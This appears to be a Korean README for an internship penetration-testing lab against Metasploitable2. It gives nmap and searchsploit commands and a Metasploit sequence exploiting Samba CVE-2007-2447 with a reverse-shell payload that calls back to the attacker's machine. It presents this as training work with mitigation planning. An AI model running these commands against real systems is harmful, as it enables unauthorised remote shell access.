
Kali Linux와 Metasploitable2를 사용한 실습형 침투 테스트 프로젝트입니다. 전체 워크플로우 포함: Nmap 스캐닝, 열거, Metasploit 익스플로잇(Samba CVE-2007-2447), 포스트 익스플로잇 검증, 완화 조치 단계. 저장소에는 명령어, 출력 결과, 그리고 공격 기법과 방어 권장 사항을 모두 보여주는 보고서가 포함되어 있습니다.
인턴십 프로젝트 2 — Metasploitable2 침투 테스트
요약: 이 프로젝트는 정찰, 열거, 익스플로잇, 사후 익스플로잇 검증 및 완화 권장 사항을 포함한 전체 침투 테스트 워크플로우를 보여줍니다. 사용된 대상은 Metasploitable2이고 공격 머신은 Kali Linux입니다.
도구: Kali Linux (공격자) Nmap (정찰) Metasploit Framework (익스플로잇) SearchSploit / Exploit-DB (분류)
수행 단계:
sudo nmap -sS -sV -p- -T4 --open -oA scans/target 192.168.x.x
식별된 서비스 (예시): vsftpd 2.3.4 (포트 21 배너), Samba smbd 3.x (포트 445).searchsploit --nmap scans/target.xml searchsploit samba 3.0.20
서비스를 잠재적 익스플로잇과 매칭 (vsftpd 백도어, Samba username-map).msfconsole use exploit/multi/samba/usermap_script set RHOSTS 192.168.x.x set payload cmd/unix/reverse set LHOST <kali-ip> set LPORT 4444 exploit
대화형 셸을 획득하고 사용자 컨텍스트를 확인함.id uname -a결과 Samba 익스플로잇을 통해 원격 셸을 성공적으로 획득하고, 공격 경로를 문서화했으며 완화 계획을 수립했습니다. 전체 로그와 명령 출력은 scans/ 폴더에 저장되어 있습니다.